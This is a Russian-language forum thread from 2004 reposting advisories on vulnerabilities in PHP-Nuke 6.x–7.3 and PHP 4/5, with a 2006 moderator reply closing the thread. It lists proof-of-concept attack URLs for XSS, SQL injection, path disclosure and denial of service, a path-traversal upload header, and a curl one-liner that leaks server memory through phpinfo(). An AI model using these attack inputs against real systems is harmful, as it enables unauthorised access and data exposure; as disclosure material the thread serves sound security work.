Компьютерный форум NoWa.cc Здесь может быть Ваша реклама
Правила Форума
редакция от 22.06.2020
Форум .::NoWa.cc::.
Вернуться   Компьютерный форум NoWa.cc > Компьютеры и Интернет > Интернет партизаны > Статьи

Уважаемые пользователи nowa.cc. Мы работаем для вас более 20 лет и сейчас вынуждены просить о финансовой помощи по оплате за сервер.
Окажите посильную поддержку, мы очень надеемся на вас. Реквизиты для переводов ниже.
Webmoney Webmoney WMZ: Z021474945171 Webmoney WME: E159284508897 Webmoney WMUSDT: T206853643180
Кошелёк для вашей помощи YooMoney 4100117770549562
YooMoney Спасибо за поддержку!

Закрытая тема
 
Опции темы Опции просмотра Language
Старый 19.11.2004, 07:53   #1
NetTiger
Guest
 
Сообщений: n/a
По умолчанию Уязвимости в PHP-Nuke

Новые уязвимости в PHP-Nuke
1



Версия: PHP-Nuke 6.x - 7.3



Обнаружено несколько уязвимостей в PHP-Nuke в модулях Reviews, Encyclopedia, и Faq. Удаленный атакующий может получить доступ

к важной информации на сервере.



1. XSS - удаленный атакующий может получить доступ к важной информации пользователей

2. SQL-инъекция в модуле Reviews. Удаленный атакующий может получить доступ к базе данных

3. Раскрытие пути к установочной директории

4. Удаленный атакующий может заставить систему потреблять большое количество ресурсов процессора, что влечет за собой отказ в обслуживании.



Пример/Эксплоит:



1. XSS

http://localhost/nuke73/modules.php?...=1&categories=[xss code here]



http://localhost/nuke73/modules.php?...op=terms&eid=1 http://localhost/nuke73/modules.php? name=Encyclopedia&file=search&eid=[xss code here]



http://localhost/nuke73/modules.php?...ry=f00bar&eid=[xss code here]



http://localhost/nuke73/modules.php?...&page=2&query=[xss code here]



http://localhost/nuke73/modules.php?..._review&title= f001&text=f002&score=9&[email protected]&reviewer =f00bar&url_title=foobar&url=[xss code here]



http://localhost/nuke73/modules.php?...review_review& title=f001&text=f002&score=9&[email protected]&re viewer=f00bar&cover=[xss code here]



http://localhost/nuke73/modules.php?...iew&title=f001 &text=f002&score=9&[email protected]&reviewer=f00b ar&rlanguage=[xss code here]



http://localhost/nuke73/modules.php?...iew&title=f001 &text=f002&score=9&[email protected]&reviewer=f00b ar&hits=[xss code here]



http://localhost/nuke72/modules.php?...f001&text=f002 &score=9&[email protected]&text=f00%253c/textarea>%2m



http://localhost/nuke73/modules.php?...comment&uname=[xss code here]&id=8&score=9



2. SQL-инъекция

http://localhost/nuke73/modules.php?...s&rop=Q&order=[sql injection code here]



3. Раскрытие пути к установочной директории

http://localhost/nuke73/modules.php?...review_review& title=f001&text=f002&score=9&[email protected]&rev iewer=f00bar&;



http://localhost/nuke73/modules.php?...tle=f001&text= f002&score=9&[email protected]&reviewer=f00&score= 9999



4. DoS-атака

http://localhost/nuke73/modules.php? name=Reviews&rop=savecomment&id=1&uname= f00bar&score=999999999999999999999999



2



Версия: PHP 4.1.2 - 5.0.1.



Две уязвимости обнаружены в PHP. Злонамеренный пользователь может раскрыть чувствительную информацию или потенциально
скомпрометировать уязвимую систему.



1. Переполнение буфера обнаружено в
обработке GET, POST и COOKIE переменных в "php_variables.c". Удаленный пользователь

может представить специально обработанное имя параметра, заканчивающееся открытой скобкой, чтобы произошла утечка памяти,
когда некоторые функции используются внутри сценария. Пример:



abc[a][



2. "$_FILES" определяет расположение загружаемых файлов. Удаленный пользователь может представить специально

обработанный Content-Disposition заголовок в комбинации с уязвимостью обхода каталога, чтобы загрузить файлы в произвольное

местоположение, чтобы затем выполнить произвольный код в этих файлах.



Пример:

Content-Disposition: form-data; name="userfile"; filename="../../../test.php"



Для успешной эксплуатации требуется PHP скрипт, который использует "$_FILES" массив для манипуляции с загружаемыми файлами.



Решение: Уязвимость устранена через CVS.



3

Версия: PHP 5.0.1 и более ранние версии



1. Удаленная перезапись памяти в PHP



Уязвимость обнаружена в PHP в обработке MIME данных. Удаленный пользователь может перезаписать память.



Уязвимость в обработке массивов обнаружена в SAPI_POST_HANDLER_FUNC() функции в 'rfc1867.c'. Удаленный пользователь может перезаписать $_FILES элемент массива.



Решение: Исправление доступно через CVS: http://cvs.php.net/php-src/main/rfc1867.c



2. Удаленное раскрытие произвольных частей памяти в PHP в функции phpinfo().



Уязвимость обнаружена в PHP в функции phpinfo(). Удаленный пользователь может получить содержание памяти.



Ошибка в обработке массивов в 'php_variables.c' может привести к отображению произвольных частей памяти.



Пример: (phpinfo.php содержит вызов функции phpinfo())



$ curl "http://www.site.com/phpinfo.php" -d `perl -e 'print "f"x100;print "[g][=1"'`



Решение: Исправление доступно через CVS: http://chora.php.net/php-src/main/php_variables.c


P.S:
инфу подогнал чел со странным ником Jesus.

Последний раз редактировалось NetTiger; 19.11.2004 в 08:00..
  Вверх
Здесь может быть Ваша реклама
Здесь может быть Ваша реклама


Реклама: нетфликс тру крайм о серийных убийцахЛучшие цены на бытовую технику: bsa6747dgwi - у нас!цыпочка широкая как называетсяИИ анализ звонков - проведение анализа продаж ai - сервис АИхабМебельный магазин: стол обеденный трансформер - Переходи на сайт!


Старый 21.05.2006, 15:02   #2
X-Kostic
Постоялец
 
Регистрация: 29.01.2005
Сообщений: 230
Репутация: 204
По умолчанию Re: Уязвимости в PHP-Nuke

Даная тема со статьей закрыта, вы можете обсудить её в теме обсуждения, но прошу не забывать посмотреть на дату написания статьи! Не смотря на то, что некоторые статьи устарели, они ещё представляют собой интерес для новичков.
X-Kostic вне форума
 
Вверх
Закрытая тема


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Уязвимости в ПО lastmylove Безопасность 200 24.03.2012 07:52
php-nuke NektoF Движки форумов и сайтов 10 14.01.2011 14:34
The foundry Nuke для создания спецэффектов в фильмах JhonNik1 Варезник 4 27.01.2010 04:36
The Foundry Nuke 4.6 OSX osynovskyy Mac Os X 6 18.05.2007 11:20

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход


Текущее время: 22:52. Часовой пояс GMT +3.


Copyright ©2004 - 2026 NoWa.cc

Powered by vBulletin® Version 3.8.9
Copyright ©2000 - 2026, vBulletin Solutions, Inc. Перевод: zCarot
Время генерации страницы 0.04105 секунды с 11 запросами